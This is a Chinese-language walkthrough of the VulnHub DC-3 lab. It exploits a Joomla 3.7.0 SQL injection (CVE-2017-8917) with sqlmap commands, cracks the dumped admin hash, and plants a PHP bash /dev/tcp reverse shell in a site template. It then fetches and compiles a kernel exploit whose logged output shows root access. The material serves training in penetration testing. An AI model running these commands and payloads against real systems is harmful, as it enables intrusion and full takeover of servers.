下載地址:https://www.vulnhub.com/entry/dc-3,312/
主機發現
掃描端口,發現只開啓了80端口,通過-A參數,還可以看到該網站的CMS爲Joomla
訪問80端口
目錄掃描,發現網站後臺
使用nikto工具:nikto -host 192.168.44.144
使用dirsearch工具
python3 dirsearch.py -u http://192.168.44.144 -e php
使用joom專用漏洞掃描器joomscan,發現joomla的具體版本號
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl 192.168.44.144
使用searchsploit搜索joomla 3.7.0存在的漏洞
searchsploit joomla 3.7.0
讀取
根據給出的路徑,讀取該文件,發現該版本cms內存在sql注入漏洞CVE-2017-8917
打開sqlmap開始注入
暴庫
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
暴表
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables
暴字段
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns
暴內容
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump
用戶名:admin
密碼:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
使用kali的John進行密碼破解,得到後臺登錄密碼snoopy
進入之前找到的網站後臺進行登陸http://192.168.44.144/administrator/
在後臺翻啊翻,發現了某處可以修改網站模版的地方,可以直接新建一個PHP文件,直接反彈shell。
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.44.142/8080 0>&1'");?>
在kali上進行監聽,nc -lvvp 8080端口
在瀏覽器上訪問該反彈馬,這一塊路徑卡了一會兒,
結合之前目錄掃描出來的templates目錄,和模板的名稱bees3,再加上linux系統是大小敏感的,
因此花費了一些時間,才找到正確的路徑,進行訪問
這是kali已經接收到了shell,
權限很低,首先嚐試suid提權,以下命令可以發現系統上運行的suid可執行文件
-
find / -perm -u=s -type f 2>/dev/null
-
find / -user root -perm -4000 -print 2>/dev/null
-
find / -user root -perm -4000-exec ls -ldb {}
已知的可用來提權的linux可行性的文件:nmap,vim,find,bash,more,less,nano,cp
沒有發現可以利用的文件
嘗試內核提權
查看linux版本
利用searchsploit搜索可以利用的漏洞
根據路徑,訪問exp詳細內容:cat /usr/share/exploitdb/exploits/linux/local/39772.txt
發現exp下載地址:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
查找具有執行權限的目錄
切換到tmp文件夾下,並且下載searchsploit中的exp
切換:cd tmp
下載:wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
解壓:unzip 39773.zip
再解壓:tar -xvf exploit.tar
切換:cd ebpf_mapfd_doubleput_exploit/
執行: ./compile.sh
./doubleput
然後得到了root權限
www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<ploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2020-04-09 23:27:16-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2020-04-09 23:27:17-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'
0K ...... 100% 4.44M=0.002s
2020-04-09 23:27:18 (4.44 MB/s) - '39772.zip' saved [7025/7025]
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772.zip
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ unzip 39772.zip
unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772
39772.zip
__MACOSX
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ cd 3977
cd 39772
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
ebpf_mapfd_doubleput_exploit
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doub
./doub
bash: ./doub: No such file or directory
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
bash -i
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# exit
bash: [2708: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$